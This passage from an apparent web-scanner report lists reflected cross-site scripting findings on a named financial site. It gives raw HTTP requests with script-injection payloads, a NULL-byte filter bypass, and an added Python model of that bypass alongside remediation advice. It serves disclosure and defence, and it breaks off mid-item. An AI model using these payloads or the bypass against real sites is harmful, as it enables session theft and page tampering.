GET /credit872aa"><script>alert(1)</script>30128d4c378 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd1db"><script>alert(1)</script>4be2103e618 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /creditdd1db"><script>alert(1)</script>4be2103e618/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18561"><script>alert(1)</script>f173eebd8e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /credit18561"><script>alert(1)</script>f173eebd8e2/credit-cards/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c0df9"><script>alert(1)</script>60b8b2ef72c was submitted in the REST URL parameter 2. This input was echoed as c0df9"><script>alert(1)</script>60b8b2ef72c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) written in native code, where strings are NUL-terminated: the filter stops inspecting at the %00 and never sees the characters after it, while the application behind it receives the whole request. The response below supports that reading, because the literal %00 survives in the canonical href, so the application neither decoded nor encoded the request URI before placing it in the attribute. Fix the actual vulnerability in the application code by HTML-attribute-encoding the request path (or, better, not reflecting it at all), and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass. The filter is defence in depth, not the control.
Request
GET /credit/credit-cards%00c0df9"><script>alert(1)</script>60b8b2ef72c/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 19:51:21 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999983
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 35372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://www.walletpop.com/credit/credit-cards%00c0df9"><script>alert(1)</script>60b8b2ef72c/"/>
...[SNIP]...
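The bypass described in this finding can be modelled directly. This added Python example (not the scanner's code, and not the site's real filter, whose rules are unknown) stands a filter that behaves like NUL-terminated C code beside the application that echoes the raw request target, runs the probe through both with and without the leading %00, and then shows a length-aware filter that closes the gap. The signature list is an assumption chosen to match the probe; the reflected markup mirrors the canonical href shown in the response above.

```python
from urllib.parse import unquote

# Constructed samples, shaped like the report's probes for REST URL parameter 2.
PROBE_PLAIN = '/credit/credit-cardsc0df9"><script>alert(1)</script>60b8b2ef72c'
PROBE_WITH_NUL = '/credit/credit-cards%00c0df9"><script>alert(1)</script>60b8b2ef72c'

# Assumed signature list; the real filter's rules are not known from the report.
BLOCKED_SIGNATURES = ('<script', '">', "'>", 'javascript:')


def native_filter_blocks(raw_path: str) -> bool:
    """Filter modelled on native code: after percent-decoding, the path is
    handled as a NUL-terminated C string, so inspection ends at the first
    0x00 byte and nothing after it is ever compared against the signatures."""
    decoded = unquote(raw_path)
    visible = decoded.split("\x00", 1)[0]
    return any(sig in visible.lower() for sig in BLOCKED_SIGNATURES)


def fixed_filter_blocks(raw_path: str) -> bool:
    """Length-aware replacement: inspect every decoded byte.  A NUL has no
    legitimate place in a URL path, so its presence alone is grounds to
    reject the request."""
    decoded = unquote(raw_path)
    if "\x00" in decoded:
        return True
    return any(sig in decoded.lower() for sig in BLOCKED_SIGNATURES)


def application_reflects(raw_path: str) -> str:
    """The application behind the filter, as the page's responses show it:
    the raw request target (still containing the literal '%00') is copied
    into the canonical href without decoding or encoding."""
    return f'<link rel="canonical" href="http://www.walletpop.com{raw_path}/"/>'


def request_outcome(raw_path: str, filter_fn) -> tuple:
    """Runs one request through a filter and, if it passes, through the
    vulnerable application.  Returns ('blocked', None) or ('reflected', markup)."""
    if filter_fn(raw_path):
        return ("blocked", None)
    return ("reflected", application_reflects(raw_path))


if __name__ == "__main__":
    for label, path in (("plain", PROBE_PLAIN), ("with %00", PROBE_WITH_NUL)):
        for name, fn in (("native filter", native_filter_blocks),
                         ("fixed filter", fixed_filter_blocks)):
            status, markup = request_outcome(path, fn)
            print(f"{label:9} {name:14} -> {status}")
            if markup:
                print("   ", markup)
```

The plain probe is caught by both filters; the probe with a leading %00 passes the native-style filter and reaches the application, which reflects it, %00 and all, into the attribute where the browser tokenizes the "> breakout. The fixed filter rejects on the NUL itself, which is the right rule for a path component, but it only narrows the filter gap: the reflection in the application is unchanged, and output encoding remains the actual fix.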
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6aed8"><script>alert(1)</script>cd21321ec8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /crib-recall6aed8"><script>alert(1)</script>cd21321ec8f HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9b23"><script>alert(1)</script>122b8a501aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /debtc9b23"><script>alert(1)</script>122b8a501aa HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e25f0"><script>alert(1)</script>9e613fe56f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /debte25f0"><script>alert(1)</script>9e613fe56f9/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f7a1"><script>alert(1)</script>163ff95afd5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fraud8f7a1"><script>alert(1)</script>163ff95afd5 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload badea"><script>alert(1)</script>5dfc2acb606 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insurancebadea"><script>alert(1)</script>5dfc2acb606 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18e6a"><script>alert(1)</script>be63be8f6bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insurance18e6a"><script>alert(1)</script>be63be8f6bc/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc16e"><script>alert(1)</script>796a576e51c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /loansfc16e"><script>alert(1)</script>796a576e51c HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26f2b"><script>alert(1)</script>6d2d8ca9cf6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /loans26f2b"><script>alert(1)</script>6d2d8ca9cf6/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e36f"><script>alert(1)</script>c1f54d8e812 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mortgages8e36f"><script>alert(1)</script>c1f54d8e812 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79cc0"><script>alert(1)</script>c2e171a7c39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mortgages79cc0"><script>alert(1)</script>c2e171a7c39/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d97b3"><script>alert(1)</script>4b8a48dd4ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mortgagesd97b3"><script>alert(1)</script>4b8a48dd4ef/refinancing HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004efb0"><script>alert(1)</script>2dd294d4521 was submitted in the REST URL parameter 2. This input was echoed as 4efb0"><script>alert(1)</script>2dd294d4521 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) written in native code, where strings are NUL-terminated: the filter stops inspecting at the %00 and never sees the characters after it, while the application behind it receives the whole request. The response below supports that reading, because the literal %00 survives in the canonical href, so the application neither decoded nor encoded the request URI before placing it in the attribute. Fix the actual vulnerability in the application code by HTML-attribute-encoding the request path (or, better, not reflecting it at all), and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass. The filter is defence in depth, not the control.
Request
GET /mortgages/refinancing%004efb0"><script>alert(1)</script>2dd294d4521 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 19:51:27 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999961
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 35379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://www.walletpop.com/mortgages/refinancing%004efb0"><script>alert(1)</script>2dd294d4521/"/>
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2063"><script>alert(1)</script>f60b05c043d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /recallsb2063"><script>alert(1)</script>f60b05c043d HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1f62"><script>alert(1)</script>9c356f694cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /recessiond1f62"><script>alert(1)</script>9c356f694cf HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d9b4"><script>alert(1)</script>7b033058fa1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /retirement7d9b4"><script>alert(1)</script>7b033058fa1 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1ffd"><script>alert(1)</script>8152f8dfc89 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /retirementc1ffd"><script>alert(1)</script>8152f8dfc89/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1965f"><script>alert(1)</script>b1379ff0c56 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials1965f"><script>alert(1)</script>b1379ff0c56 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bb4a"><script>alert(1)</script>24b3176fe0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes6bb4a"><script>alert(1)</script>24b3176fe0b HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://www.walletpop.com/taxes6bb4a"><script>alert(1)</script>24b3176fe0b/"/>
...[SNIP]...
1.734. http://www.walletpop.com/taxes [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.walletpop.com
Path: /taxes
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3276c"><script>alert(1)</script>bfe4d36dc5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes?3276c"><script>alert(1)</script>bfe4d36dc5b=1 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 752da"><script>alert(1)</script>a51d1f99850 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes752da"><script>alert(1)</script>a51d1f99850/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://www.walletpop.com/taxes752da"><script>alert(1)</script>a51d1f99850/"/>
...[SNIP]...
1.736. http://www.walletpop.com/taxes/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.walletpop.com
Path: /taxes/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a8f3"><script>alert(1)</script>895d57e05f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/?6a8f3"><script>alert(1)</script>895d57e05f=1 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccf25"><script>alert(1)</script>fd247453795 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxesccf25"><script>alert(1)</script>fd247453795/advice HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a6b4c"><script>alert(1)</script>89b67810fa1 was submitted in the REST URL parameter 2. This input was echoed as a6b4c"><script>alert(1)</script>89b67810fa1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) written in native code, where strings are NUL-terminated: the filter stops inspecting at the %00 and never sees the characters after it, while the application behind it receives the whole request. The response below supports that reading, because the literal %00 survives in the canonical href, so the application neither decoded nor encoded the request URI before placing it in the attribute. Fix the actual vulnerability in the application code by HTML-attribute-encoding the request path (or, better, not reflecting it at all), and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass. The filter is defence in depth, not the control.
Request
GET /taxes/advice%00a6b4c"><script>alert(1)</script>89b67810fa1 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 19:51:35 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999914
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 35349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://www.walletpop.com/taxes/advice%00a6b4c"><script>alert(1)</script>89b67810fa1/"/>
...[SNIP]...
1.739. http://www.walletpop.com/taxes/advice [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.walletpop.com
Path: /taxes/advice
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 171d1"><script>alert(1)</script>13a164dad11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/advice?171d1"><script>alert(1)</script>13a164dad11=1 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a7ee"><script>alert(1)</script>96a2598453f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes1a7ee"><script>alert(1)</script>96a2598453f/advice/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f5ece"><script>alert(1)</script>c74704fcc55 was submitted in the REST URL parameter 2. This input was echoed as f5ece"><script>alert(1)</script>c74704fcc55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /taxes/advice%00f5ece"><script>alert(1)</script>c74704fcc55/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 19:51:29 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999959
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 35352
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/taxes/advice%00f5ece"><script>alert(1)</script>c74704fcc55/"/> ...[SNIP]...
1.742. http://www.walletpop.com/taxes/advice/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.walletpop.com
Path: /taxes/advice/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efc20"><script>alert(1)</script>1eac2732ded was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/advice/?efc20"><script>alert(1)</script>1eac2732ded=1 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d975d"><script>alert(1)</script>c9b1aece5a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/articled975d"><script>alert(1)</script>c9b1aece5a7/10-most-common-tax-mistakes-to-avoid/888611 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7018a"><script>alert(1)</script>83874f2a097 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /taxes/article/10-most-common-tax-mistakes-to-avoid7018a"><script>alert(1)</script>83874f2a097/888611 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de38a"><script>alert(1)</script>7f8353795a0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /taxes/article/10-most-common-tax-mistakes-to-avoid/888611de38a"><script>alert(1)</script>7f8353795a0 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bef7b"><script>alert(1)</script>f949f1f57f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxesbef7b"><script>alert(1)</script>f949f1f57f2/basics HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0079946"><script>alert(1)</script>0a2e7e95fa4 was submitted in the REST URL parameter 2. This input was echoed as 79946"><script>alert(1)</script>0a2e7e95fa4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /taxes/basics%0079946"><script>alert(1)</script>0a2e7e95fa4 HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 19:51:34 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999967
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 35351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/taxes/basics%0079946"><script>alert(1)</script>0a2e7e95fa4/"/> ...[SNIP]...
1.748. http://www.walletpop.com/taxes/basics [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.walletpop.com
Path: /taxes/basics
Issue detail
